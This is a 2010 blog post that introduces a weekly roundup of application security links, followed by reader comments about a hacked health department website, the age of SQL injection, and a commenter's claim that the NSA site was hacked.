Friday, February 12, 2010

Best of Application Security (Friday, Feb. 12)

Ten of the application security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

4 comments:

Martin Hall said...

On Number 3
(Hacker causes DOH site to close)

Maybe we need to close all of the National Health sites.

Every one I checked was Vuln.

I'm a tester by trade and all of those sites would never have made it past on any of my teams.

Poor testing, if any was done at all.

If you're testing websites and you're only testing for functionality and not security, then you're not really testing at all.

Jeremiah Grossman said...

@Martin, all I can say is "damn." -- no further comment required.

Chris Schmidt said...

wow - really?

'not sufficiently robust to withstand modern day hacking'.

I would hardly call SQLi 'modern day' since it predates the website by at least a few years.

I guess it could be considered modern day if you still consider Dial-up internet access to be bleeding edge.. :)

IT Ninja said...

btw, the National Security Agency was recently hacked. Yes, hacked! But it was downplayed to the media for obvious shameful reasons. Here's the link:

http://pinoysecurity.blogspot.com/2010/02/wwwnsagov-hacked.html